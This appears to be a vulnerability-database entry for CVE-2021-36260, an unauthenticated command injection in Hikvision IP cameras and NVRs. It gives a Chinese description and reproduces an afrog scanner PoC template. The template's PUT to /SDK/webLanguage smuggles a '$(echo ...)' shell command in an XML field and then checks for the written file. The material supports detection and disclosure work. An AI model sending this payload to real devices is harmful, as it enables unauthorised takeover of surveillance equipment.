Hikvision IP camera/NVR - Unauthenticated RCE

漏洞信息

漏洞名称： Hikvision IP camera/NVR - Unauthenticated RCE

漏洞编号：

• CVE： CVE-2021-36260

漏洞类型： 命令执行

漏洞等级： 严重

漏洞描述： 该漏洞影响的是海康威视（Hikvision）的部分IP摄像头和网络视频录像机（NVR）产品。海康威视是全球领先的视频监控设备供应商，其产品广泛应用于公共安全、交通、金融、教育等多个领域。由于这些设备通常部署在关键基础设施中，漏洞的存在对安全构成了严重威胁。漏洞的具体类型为命令执行，根源在于Web服务器对输入验证不足。攻击者可以通过发送包含恶意命令的消息，利用此漏洞发起命令注入攻击。这种攻击不需要认证，即可远程执行任意命令，可能导致设备被完全控制、数据泄露或服务中断。由于漏洞的严重性和易用性，它被评级为’严重’级别。攻击者可以利用此漏洞自动化地攻击大量设备，因此受影响的产品用户应尽快应用安全补丁以缓解风险。

产品厂商： Hikvision

产品名称： Hikvision IP camera/NVR

来源： https://github.com/zan8in/afrog/blob/2f6722015a76956b8f84dd0c2780c67e9e933ae9/pocs%2Fafrog-pocs%2FCVE%2F2021%2FCVE-2021-36260.yaml

类型： zan8in/afrog:github commit

POC详情

id: CVE-2021-36260

info:
  name: Hikvision IP camera/NVR - Unauthenticated RCE
  author: pdteam,gy741
  severity: critical
  verified: true
  description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
  reference:
    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
    - https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36260
    - https://github.com/Aiminsun/CVE-2021-36260
  tags: cve,cve2021,rce,hikvision
  created: 2023/08/09

set:
  rand1: randomLowercase(16)
rules:
  r1:
    request:
      method: PUT
      path: /SDK/webLanguage
      body: |
        <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{rand1}}>webLib/x)</language>
    expression: response.status == 500 && response.body.bcontains(b"<ResponseStatus")
  r2:
    request:
      method: GET
      path: /x
    expression: response.status == 200  && response.body.bcontains(bytes(rand1))
expression: r1() && r2()